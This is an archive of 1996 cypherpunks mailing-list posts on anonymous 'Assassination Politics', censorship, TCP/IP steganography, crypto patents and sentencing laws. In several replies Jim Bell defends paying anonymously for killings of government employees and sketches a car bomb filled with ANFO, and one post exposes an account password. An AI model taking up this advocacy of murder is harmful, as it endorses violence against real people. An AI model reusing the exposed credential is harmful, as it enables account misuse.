who believes in what they do.  In our discussion, this question comes down
to: are IRS employees more like corporate consultants or like soldiers.

(4) I think that if someone can be traced as profiting from a AP death,
e.g. through winning a gamble on the date/time of death, that person's
whereabouts at the time of death will be carefully investigated.

(5) While killing someone whose name and residence are known is easy, and
the killer is likely to get away with it, does that mean that killing
someone who has been marked as having a price on her head is as easy?  I
assume her friends and neighbors will protect her.  The TV cameras will be
running 24 hours a day.  This will, at a minimum raise the price of
assassinations.

Regards (that means you too, Jim Bell) - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 10 Mar 1996 14:26:52 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: rhetorical trickery
In-Reply-To: <199603082153.NAA28521@netcom4.netcom.com>
Message-ID: <5s9HkD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Lance Deitweller posting as Vladimir Z. Nuri <vznuri@netcom.com> writes:
> I noticed a rhetorical trick/trap that I've seen a lot lately, in the
> recent article posted about Phil Zimmermann.
>
> there is an infamous case of a child pornographer or pedophile in
> California that is sometimes cited by law enforcement representatives
> as a good example of the evils of encryption: supposedly he encrypted
> his diary and it couldn't be unlocked by them. this was mentioned in
> the article.

Did this really happen? I've never seen any concrete references to this
incident and strongly suspect it's another urban legend.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sat, 9 Mar 1996 17:43:18 +0800
To: adam@lighthouse.homeport.org
Subject: Re: News on RSA vs. Cylink Injunctions and Patents
Message-ID: <199603090712.XAA01336@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam,

It is absolutely true that RSA has seen the light, and now believe that
the DH and HM patents are not valid.  I think that they had this realization
on the day that they lost control of these patents, with the breakup
of PKP.

Roger Schlafly has been fighting these patents as well, and it appears to
me that DH should be completely dead, it was widely publicized more than
a year before the patent was filed.

I don't believe RSA's interpretation of the judges ruling, though.
Certainly they will twist the words in the most favorable way.

RSA had been saying that Hellman-Merkle, not Diffie-Hellman, covered
all public key patent ideas; but they were only saying that through
PKP (which was a joint venture between themselves and Cylink)

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MFN@FRCU.EUN.EG
Date: Sat, 9 Mar 1996 11:18:08 +0800
To: cypherpunks@toad.com
Subject: Where to find krypto?
Message-ID: <01I245H7CTVG005E8A@FRCU.EUN.EG>
MIME-Version: 1.0
Content-Type: text/plain


Dear friends,
	Can you advice where to find krypto or any good cryptanalysis software.
                                                Yours sincerely,
							Mohamed Farouk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 9 Mar 1996 18:14:10 +0800
To: cypherpunks@toad.com
Subject: Re: SurfWatch
In-Reply-To: <199603082252.OAA03409@netcom7.netcom.com>
Message-ID: <31414295.4DBE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:
> 
> At  3:27 PM 3/8/96 -0800, Timothy C. May wrote:
> >(By the way, adult magazines voluntary label themselves as "adult": my
> >understanding from several comments by lawyers and adult industry
> >spokesmen, is that they are under no obligation to "voluntarily label"
> >their stuff. And some libraries have an _explicit_ policy that says any
> >card-holder, of any age, may check out or look at _any_ item the library
> >carries.)
> 
> IMHO Adult magazines label themselves "adult" as a form of advertising.  In
> the same way, a site with a sufficiently hard core self-rating may attract
> customers specifically because of the rating.

  I predict that 6 months after the first internet rating system is widely
deployed, the largest use of search engines such as altavista will be to
look for pages with the most "naughty" ratings.  Perhaps such services will
allow text searches for free, but charge for searches based on the rating
tag...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sat, 9 Mar 1996 18:31:27 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: U.S. State Dept criticizes Chinese net-censorship
In-Reply-To: <clEAnke00YUuMq9H4t@andrew.cmu.edu>
Message-ID: <Pine.3.89.9603090004.A25880-0100000@netcom7>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 8 Mar 1996, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 8-Mar-96 Re: U.S. State Dept
> critici.. by JFA T. QC, Canada@citene 
> > There is no such thing as "self-censorship".  Either you stick to 
> > your values, and then it is *not* censorship, or then you do not,
> > and then, it is neither.
> 
> Self-censorship does happen, and it's a growing problem in the arts
> community. (I'm not a commercial artist, so this is my understanding
> from other panelists and speakers at a conference I spoke at last month.)
> 
> Making art more palatable or less "extreme" to curry favor with
> corporate patrons, or to get that NEA grant, or to get that faculty
> position is self-censorship, and it does happen.
> 

To me this sounds more like an argument on perspective.

IF you hold to the premise that self-censorship is based in a large part 
on witholding your natural inclination and/or reaction, then yes the 
argument can be made that self-censorship occurs all the time. However, I 
would submit that J.F.A. is correct and that your position is but a 
subset of the original statement.

To wit: If I found myself in a situation where the person involved was 
behaving like a jerk - but I did not speak my mind (as to achieve some 
defind goal, favor, etc.) because my moral compass indicated that such an 
action was inappropriate to acheive said goal - then I can make the case of 
both self-censorship (by your definition) and non-censorship (as none was 
required) by J.F.A's definition. It's called personal restraint based 
upon the practice and acceptance of culturally defind rules of civil 
behavior within a particular community.

As to the art community:

I find pieces of "art", such as the cross in the urine, extremely 
distasteful and insulting to the christian sects who value that symbol as 
part of their religious culture. However, the NEA thought it was 
"brilliant" enough to warrant a grant to the artist in question - who 
profited by his work. Now, who, if anybody is correct in their stance 
about what is or is not "acceptable" material for publication and support 
with tax dollars ?

Anwser? It's purely subjective. I choose to censor my viewing to not 
include works that I deem offensive or immaterial. Obviously, somebody 
thought it was wonderful enough to give the guy money for his effort. 
Different strokes for different folks.

As to censorship itself:

Censorship, IMO, is tool that we (as people) use every day to screen out 
unwanted or unnecessary information. It is not a bad thing - just a tool. 
Where things change with respect to it (as a tool) is in to what purpose 
it is put.

When censorship is encouraged or utilized for the express purpose of 
controlling information content and/or flow so as to subjegate the will 
of another to your own control, then I personally view this as wrong. 
Others will disagree (especially in certain sections of UNCLE). They will 
make the case for service to the community based upon National Security 
interests, politcal cause, religious, etc. So be it.

As it stands, even with the exercise of unrighteous dominion, we still 
have the agency to choose to accept or reject the conditions we find 
ourselves in. Rationalization only serves to salve our conscience when we 
tell ourselves there is no choice, when we have already made the choice 
and have resigned ourselves to it.

The founding fathers wrote the Bill of Rights in the order of appearance 
for a specific purpose and intent. They did not enjoy the same freedom of 
discussion and representation as we do today (even with all the silly 
restrictions UNCLE seems to feel are necessary in legislating our 
morality). The First Amendment (free speech) was first because they felt 
it was more important than all the rest. Without it, the other amendments 
are without meaning and just execution.

However, they did not intend that such rights as free speech be practiced 
without using common sense. It is one thing to hold a view repugnant to a 
community of your peers - but quite another to attempt to force that view 
upon them without their consent by court action or political coercision. 
The tired and worn example of shouting "FIRE!" in a crowded movie house 
is a perfect example of a bone-head manuever made to test the fence. In 
some other place or time, it may be considered funny or annoying - but in 
today's society (where people tend to get hyper-sensitive) it is 
considered criminal by statute of law as the potential consequence of 
such an action may inadvertantly bring harm to another. Hence - we as a 
culture have attempted to codify common sense into legal statute (which 
itself is a larger bone-head maneuver attempting to rectify the first).

Where does this leave things:

For society at large, the divisiveness of the actions promulgated by 
people looking for offense - coupled with the encouragement by lawyers to 
seek redress by way of tort (which profits them, but not the litigating 
parties), only serves to tear the fabric of the republic as it was 
created by the founding fathers. We will willingly GIVE UP our right to 
free speech in all it's forms over time because our selfish behavior 
encourages us to act unwisely to "get even" with the other guy. The 
government has to do nothing except sit back and encourage the trend, so 
that people will petition the very goverment that derives it power and 
authority from the governed to take it away from them. Then, when it is 
too late - they will realize that they gave away their most precious 
posession - as Esau gave up his birthright over a meal.

I wouldn't worry about the art community and any perception of 
self-censorship. Historically, artisans, writers, scientists and other 
creative people tend to be among the first of the rats to flee the 
sinking ship and swim to places more tolerant of their world view. There 
will always be a home for such people as creativity is always appreciated 
in one form or another by somebody.

...Paul






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Koschmann <bryank@comtch.iea.com>
Date: Sat, 9 Mar 1996 19:08:13 +0800
To: cypherpunks@toad.com
Subject: test
Message-ID: <2.2.32.19960309094044.0069cef8@comtch.iea.com>
MIME-Version: 1.0
Content-Type: text/plain


just a test to see if my filter works..sorry3 for any inconvenience
	Gate|<eepeR (!-=Gate|<eepeR ruLeZ=-!)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Mon, 11 Mar 1996 05:22:51 +0800
To: cypherpunks@toad.com
Subject: Re: TCP/IP Stego (was CU-SeeMe)
In-Reply-To: <199603082056.MAA20781@netcom7.netcom.com>
Message-ID: <Pine.A32.3.91.960309005518.27482B-100000@seminole.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Okay, i'm going to try to address things systematically, here goes..
(excuse non standard quoteing)
_______________________

>From savron@world-net.sct.frSat Mar  9 00:54:38 1996

>Fine idea to create a subliminal channel using packet parity on an 
>ftp connection but this is not a peer connection , so can't be used 
>to do subliminal chat (for example) but could be used to do 
>subliminal mail delivery .

------------------------

Since the data is steg'd into the tcp header and not the data you are 
sending (openly) it doesnt make much difference what client is generating 
the packets. Could be a web server. Could be a Y/Ntalk client, a sendmail 
daemon, or a telnet. The greatest restriction being that you only get 
about 1k per 500k .. which is a bit cumbersome in most cases. More on 
that later.

------------------------

>From JonWienke@aol.comSat Mar  9 00:54:43 1996
Subject: Re: TCP/IP Stego (was CU-SeeMe)

>This is a bad idea, because in addition to the extra processor overhead, it
>is an incredible waste of bandwidth.  For a 512 byte packet, you are only
>getting .02% efficiency, because you wouldn't be able to use the actual data
>in the packet; otherwise someone would probably notice the increased error
>rate if you dink around with the checksum.  

No need to do anything strange to the checksum.  In the normal process of 
framing packets data is buffered, and packets are 'padded' to make a full 
packet. The hacked tcp protocol would simply be a bit more selective 
about where and when padding was added. The checksum would still be a 
valid checksum for that packet - we would simply select a packet that gave 
a correct checksum value. The overhead for this is more than with 
standard tcp but could hardly be considered a serious drain of cpu cycles.

As for wasted bandwidth: That could be seen as a problem, but there are a 
few things to offset the overhead, the big one being that it doesnt make 
any difference what form the carrier data takes.. if you can generate 
half a meg of ANYTHING that can be plausibly sent to another machine, 
then you can send your 1k of data. If implemented properly the carrier 
data wouldnt even need to all come in through the same route. This 
scenario leaves any one who may be watching with quite a haystack, and a 
very small needle to find.

>This does not provide adequate plausible deniability.  Stegoing a 16 bit 

I disagree. Consider: the packet, taken bit by bit, or as a whole, 
would be completely valid - with nothing added, or taken away except 
perhaps the few octets that would need to be dropped to acheive the right 
parity. This would actually be very few, since you have a 
50% chance that the parity will be correct to begin with. 

---------------------

From: Jim McCoy <mccoy@communities.com>
Subject: Re: TCP/IP Stego (was CU-SeeMe)


>I think that the original poster meant twiddling some of the (relatively)
>unused fields of the header which most routers and applications do not
>care about, the type-of-service field or priority would good place to
>start.  

I'm pretty certain that altering TOS would pretty well scrap the packet, 
but im not positive. <shrug>. Sequence numbers are definitly out. However 
i think that playing with the priority flag could definitly work. Also a 
parity check of the 'window' field could be done quite easily. Only 
problem i see is that 'priority' packets basically are only used for 
special characters and the like, for example to send 'ctrl-c' to a 
abort a running ftp. Having a large number of priority packets would be 
reletivly noticable. The window field is a bit more promising - you'd 
need to prove the arrival sequence and timing of each packet and ack in the 
stream to prove that it had been tweaked.

>This would have no effect on the data in the packet, particularly
>if you fiddle at the IP level instead of TCP.  
[tons of good things I hadnt even thought of snipped]

--------------------

From: Bill Frantz <frantz@netcom.com>
Subject: Re: TCP/IP Stego (was CU-SeeMe)

>If you can hack your TCP implementation, you should be able (with a high
>probability) stego information in a few bits of the TCP checksum by
>adjusting the packet boundries of the TCP stream.  An error correcting code
>protocol would cover the cases where you couldn't get that *%$# bit set
>correctly.  Please note that this technique would not result in TCP
>checksum errors.

Thank you! This is what I was attempting (apparantly quite poorly) to say 
in the original post. 

:) 

Benji






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Mon, 11 Mar 1996 05:21:21 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
In-Reply-To: <199603090558.VAA18420@ix7.ix.netcom.com>
Message-ID: <9603090715.AA16941@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	Bill Stewart wrote:
> 
> Not much - Government Radio said tonight that they're not allowed to
> plea-bargain third strike felonies down to misdemeanors.  The LA public
> defender's office is absolutely swamped, partly because third-strike
> cases are supposed to get diligent support, and partly because they
> have to go to trial rather than plea-bargaining a guilty, which is less work.
> The county jails are also having serious crowding problems, because
> prospective third-strikers are being kept in them pending trial
> to avoid risk of flight, so non-third-strike jailees are getting out
> early (especially drug violators.)
> 
	The Friday (3/8/95) NYT has an article by Fox Butterfield on
this which points out that CA is unique in having a three strikes law
that does not require three violent felonies.  Apparently most other
states do require three serious violent felonies. Wilson (the CA
governer and would be presidential candidate) is claiming that the
extremely harsh CA law is reducing crime rates for two straight years
for the first time - but others point out that they have been falling
nationally, including in states without three strike laws.  The article
also points out that in a state with a 7% black population 43% of the
three time losers are black.

	The article mentions that 192 people were sentenced under
the law for marijuana possesion compared to 40 murderers, 25 rapists
and 24 kidnappers.

	Sorry for the digression from crypto ...

						Dave Emery
						die@die.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 9 Mar 1996 17:55:58 +0800
To: cypherpunks@toad.com
Subject: Re: U.S. State Dept criticizes Chinese net-censorship
Message-ID: <9603090731.AA27437@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Excerpts from internet.cypherpunks: 8-Mar-96 Re: U.S. State Dept
>critici.. by JFA T. QC, Canada@citene 
>> There is no such thing as "self-censorship".  Either you stick to 
>> your values, and then it is *not* censorship, or then you do not,
>> and then, it is neither.
>
>Self-censorship does happen, and it's a growing problem in the arts
>community. (I'm not a commercial artist, so this is my understanding
>from other panelists and speakers at a conference I spoke at last month.)
>
>Making art more palatable or less "extreme" to curry favor with
>corporate patrons, or to get that NEA grant, or to get that faculty
>position is self-censorship, and it does happen.

No, it does not.  Making art more palatable is simply the process of 
free trade between two uncoerced entities.  If the artist does not offer
what the corporate purchaser wants he will not sell.  He thus adapt his
style out to his customer.  Nobody is threatening to use force to
have the artist conform to the client.  Nobody is forcing the client 
to buy what he does not like.

The artist does not have to compromise, he simply have to refuse the 
contract.

Anybody using the term "censorship" to describe that is in the following
situation : he *wants* the advantages of the contract (money) without
respecting the customer, therefore.  He deplores the fact that somebody
(the customer) can act to his best judgment.  The fact that the artist
calls that censorship shows that he have the same thought process as
the true censorers, i.e. the conviction that the end justify the means,
and more specifically, the feeling that *his* ends justify *any* means.

The artist may not act on his feelings but nevertheless, they are, in
essence, of this nature.

And unfortunately, too many artists think that way.

JFA
Accepting a grant is accepting stolen money.
The collectivists and their free-lunchers be DAMNED!
Restore an objective monetary standard such as gold!



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMUDVbsiycyXFit0NAQHG0gf+P1rmX5xQiRo5sHpvYBlvvclVdGxJaJ6c
E+n35ln3/FFMGiguk5TEr6tOG+vj6UNBW2VibggQ9HkMkQ+6yTeJRrWQVje+YxxY
pygYrY6wfDB8F9aemkVIiypZqvo+UrG+IZwKSsuqZuFmyxu5VsnAzFB/NQS6z/fq
WPnm23t51kj2d6e+1PDVJRmv1Gpjaj34xt9YIif7S7fXdMI8vRbopRkoFfbXcFsE
+I+fzeIPINXde44duW/tUmVbPZcrwxNgL0xo7AZ3fwzYGqOw2cR3zNFH9iPWs6O5
iV+fNIx2f1sKl1MbkydEHtPVctLT3cqX0Bvi5f0k6XKdzmCMGSOr9g==
=qWzV
-----END PGP SIGNATURE-----

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 9 Mar 1996 18:00:09 +0800
To: cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <9603090731.AB27437@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> wrote:

>	Has it? Currently, we've got the guys who deal with the public (the
>politicians and the low-level bureaucrats) and the faceless drones (the rest
>of the bureaucrats). The politicians can be protected, and already are to some
>degree. The low-level bureaucrats aren't _that_ likely to be targeted by enough
>people to make a difference, and the ones who go bad enough to do so can be
>protected (or sacrificed, if that seems to be the way to keep the public
>happy). The faceless drones can be even more faceless, and so very hard to
>target.

Just a question to you:

What makes the faceless drones powerfull?

JFA
Over the clouds, the sun always shine.

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sat, 9 Mar 1996 18:27:58 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <199603090830.DAA02855@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Note: This post is 100% free of crypto.

Bill Stewart wrote:
[..]
> And the guys who just got busted for having fertilizer, diesel oil,
> and drugs on their farm had a whole three ounces of marijuana and
> personal-use quantities of crank.  Maybe they were planning to blow up
> buildings rather than stumps; but the Feds are trying to paint them
> as max evil just to build up their case.

Perhaps they were going to use the fertilizer for the grass and the 
heating oil to keep warm (or to keep the plants warm).  It's possible...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUFBjyoZzwIn1bdtAQFAvgF/ZarRLbmt6KLiK3XPMWqdmPeGs5dg0Jpm
aLndW+LmNJODCB2q4Xh9/IrCJ8awEvf9
=P4i6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 9 Mar 1996 18:52:15 +0800
To: wlkngowl@unix.asb.com>
Subject: Re: FCC v. Internet Phone?
In-Reply-To: <199603090248.VAA01654@bb.hks.net>
Message-ID: <QlEIzV200YUvJBfG46@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 8-Mar-96 FCC v. Internet Phone? by
Mutant Rob@unix.asb.com 
> I've done a scan of the NYT web site (www.nytimes.com) and the AP
> and Reuters... no mention of this at all, though there's a new blurb
> about another company promopting an Internet Phone type technology.

I was contacted by a reporter from the Boston Globe who plans to write
about it. Some net-publications have picked or soon will pick it up, I
believe.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 9 Mar 1996 15:53:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <19960308191623236.AAA160@www2>
Message-ID: <199603090455.FAA13361@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Switchboard" == Switchboard Registrar <registrar@switchboard.com> writes:

    Switchboard>      Email: cypherpunks@toad.com Password: JimArts

I changed the password to cypherpunks. That's easier to remember.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 9 Mar 1996 21:58:38 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <199603091257.HAA03427@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


jamesd@echeque.com wrote:

> In theory one would expect the law to have this unjust effect,
> but in practice most of the poster boys that people give as
> examples of the injustice of this law are folk that one would
> like to see taken behind a barn and shot out of hand.

Three strikes you're fried eh?  Dont even bother cutting off
their hands - straight to old sparky thats what I say!

In theory one would expect the law to deter folk from committing
crimes, but in practice folk (a) don't expect to get caught which
means there aint no deterrent, or (b) the folk don't consider
the crime to be serious, eg. smoking pot.


Mutant Rob wrote:

> Bill Stewart wrote:
> [..]
> > And the guys who just got busted for having fertilizer, diesel oil,
> > and drugs on their farm had a whole three ounces of marijuana and
> > personal-use quantities of crank.  Maybe they were planning to blow up
> > buildings rather than stumps; but the Feds are trying to paint them
> > as max evil just to build up their case.
> 
> Perhaps they were going to use the fertilizer for the grass and the
> heating oil to keep warm (or to keep the plants warm).  It's possible...

Yeah, but it don't go off by itself, it needs a big kick.
Did they find any dynamite or other real explosives?  I doubt it.



- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUGAOSoZzwIn1bdtAQH73gGAhV1UF2rU4lYz2Dc1jEi+GnYIds6aDOsX
ymKYkdjoDo6+z4ypYbLJsOq9eM6es/AS
=TvUJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Mon, 11 Mar 1996 03:42:45 +0800
To: cypherpunks@toad.com
Subject: Petty Civil Disobedience
Message-ID: <199603091317.IAA12223@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> 
>   I predict that 6 months after the first internet rating system is widely
> deployed, the largest use of search engines such as altavista will be to
> look for pages with the most "naughty" ratings.  Perhaps such services will
> allow text searches for free, but charge for searches based on the rating
> tag...

Not much crypto relevance, but the CDA has had much more effect than we may
realize at first. I regularly read about 25 newsgroups with an extremely wide
range of subject matter, and over the last few weeks I have seen literally
hundreds of people with things in their .sigs like, "Please excuse this CDA-
required obscenity: FUCK."

Victimless crime laws (more accurately, "consensual crime laws") have this as
their primary effect, I've found, especially when the "crime" in question is
especially petty or harmless to others. When the public is treated like a
child, it will start acting more like one. The greater the penalty for any
transgressions, the more people will start transgressing. Naturally, this
doesn't mean a whole hell of a lot in the big picture -- as James Donald has
said, if just one out of a hundred tax serfs picked up their gun and said,
"I ain't payin'," the IRS would collapse. This hasn't happened because most
people aren't into civil disobedience -- or rather, NOT WHEN THEY FEEL THE
RISK IS TOO GREAT. But if they perceive little or no risk, they will happily
break the law regularly and openly, making no attempt to conceal their
activities. Childish, because there are far more meaningful laws they could
be ignoring. But the first reaction of a child when it's told it can't do
something is to go out and do it.

Obviously, very few people feel truly threatened by CDA penalties.

-- 
http://yakko.cs.wmich.edu/~frogfarm  ...for the best in unapproved information
Tell your friends 'n neighbors you read this on the evil pornographic Internet
"Where one burns books, one will also burn people eventually." -Heinrich Heine
People and books aren't for burning. No more Alexandrias, Auschwitzs or Wacos.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 11 Mar 1996 03:36:34 +0800
To: cypherpunks@toad.com
Subject: SWI_tch
Message-ID: <199603091331.IAA24276@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Science, 1 March 1996: 
 
   "Isotope Switch Toughens Transistors." 
 
      Semiconductor researchers are reaching for superlatives 
      to describe the discovery that a simple isotope switch 
      deuterium for hydrogen can improve transistor lifetimes 
      by factors of 10 to 50, according to a paper just 
      accepted at APL.  The finding "has huge implications 
      worldwide," says Dan DiMaria of IBM. 
 
   "Mixing Nanotube Structures To Make a Tiny Switch." 
 
      Two research teams have developed a way to make an 
      all-carbon nanotube that behaves like a semiconductor at 
      one end and a metal at the other. The intersection in 
      the middle forms a gatelike junction that controls the 
      flow of electrons. In the macroworld, such gates, known 
      as heterojunctions, form the basis for transistors and 
      a host of other electronic devices. (PRL, 5 February.) 
 
   SWI_tch 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Mar 1996 02:37:53 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics(tm) was V-chips, CC, and Motorcycle Helmets
Message-ID: <m0tvRfH-00091PC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 PM 3/8/96 -0800, Bill Frantz wrote:

>Since my name keeps getting dragged into this discussion, I will share with
>youall the conclusions I reached after my last set of exchanges with Jim
>Bell.
>
>(1) Assassination Politics (AP) will be most useful to a fired-up group of
>people who want to silence a single person.  Madeline Murray O'Hare comes
>to mind.  (She was a Texas atheist who challenged school prayer and won.)

I think that's a misleading conclusion.  While it may, arguably, be "most 
useful" useful to one kind of person or another, that doesn't mean that it 
won't be, cumulatively, vastly more useful to the rest of the population.  
To carry the gun analogy a bit further, somebody might argue that "a handfun 
will be most useful to a criminal in the commission of a robbery."  Aside 
from gloriously ignoring the self-defense issue, this interpretation falsely 
implies that the fact that SOME bad person might benefit from it justifies 
banning them.


>(2) Jim Bell and I disagree strongly on the market price for assassinations.

Is this relevant?  And I don't recall where the "disagreement" you describe 
exists:  I think there will be some people killed for $1000, some won't be 
killed for less than $100,000.

>(3) Jim Bell and I disagree on the number of deaths needed to deter someone
>who believes in what they do.  In our discussion, this question comes down
>to: are IRS employees more like corporate consultants or like soldiers.

It's far easier to "believe in what they do" when nobody is out there 
planning to kill them for doing it.


>(4) I think that if someone can be traced as profiting from a AP death,
>e.g. through winning a gamble on the date/time of death, that person's
>whereabouts at the time of death will be carefully investigated.

By whom will it be investigated?  And it's merely a matter of ensuring that 
the payments can be made anonymously; I would consider anyone who tried to 
do such traces to be an enemy, and I'm sure anyone who believed in the 
underlying idea would as well.

>(5) While killing someone whose name and residence are known is easy, and
>the killer is likely to get away with it, does that mean that killing
>someone who has been marked as having a price on her head is as easy?  I
>assume her friends and neighbors will protect her. 

Question:  Let's suppose your neighbor had a $20,000 price on his head.  
Even if, arguably, you didn't want to see him die, you also wouldn't want 
somebody to drive a car through his front wall, filled with 1000 pounds of 
ANFO, and blow his house up, along with doing tens of thousands of dollars 
of damage to your house as well.  I would say you would have somewhat of a 
motivation to ensure that when the killing eventually occurred, it occurred 
in a way that wouldn't negatively affect you.

> The TV cameras will be
>running 24 hours a day.  This will, at a minimum raise the price of
>assassinations.

That won't mean much if the "minimum price" went to $20,000.  This could 
easily be raised for many government employees.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Mar 1996 03:56:18 +0800
To: djw@vplus.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <m0tvSOH-00091jC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:19 PM 3/8/96 -0800, Dan Weinstein wrote:


>> Second, if what they're charging is the hindrance of an
>> felony investigation, it isn't clear to me why they would be
>> limiting the charging of that "crime" to only those actually who
>> have committed a felony. (logic isn't the normal mode of thought for
>> a government employee, you realize.)  
>
>I agree with your concerns here, but I find it hard to believe that 
>the courts would allow a broader interpretation.

Unfortunately, what you find "hard to believe" I find easy to believe.  
Remember, if this bill is passes, it doesn't merely affect YOU, it affects 
ME.  So I suggest the burden of proof is on YOU to show that these 
provisions aren't going to be maliciously interpreted by the courts.
 

>>  Third, all they have to do is to "suspect" the person of a felony,
>>  and a 
>> "felony investigation" starts.  That would presumably make him
>> guilty of the Leahy bill's provision, regardless of whether he is
>> actually participating in the crime supposedly being investigated.
>
>Here you are dead wrong, the bill specifically states: "in furtherance 
>of a felony."  Its like those laws that let them charge someone with 
>murder in the first if someone dies while you are commiting another 
>felony.  They must prove the original felony before they can get you 
>on the murder one.  The real purpose of this provision, as I read it, 
>is to give longer sentences to criminals that use crypto.

I'm not a lawyer, but I assume neither are you.  Please explain the LEGAL 
DEFINTION of "in furtherance of a felony."  If you can't, then you simply 
don't know how far they will go.  And you're depending on the reasonableness 
of the government for the interpretion.

>> Fourth, I gave what I considered to be a clear example of the
>> hypothetical misuse of an encrypted remailer by the cops, one that
>> would arguably make the remailer operator guilty of some
>> "reasonable" anti-kiddie-porn statute.  At that point, _he_is_ the
>> target of the investigation.  Unless you can show that this kind of
>> action by the government is impossible, I consider it to be not
>> merely possible but almost certain to occur.
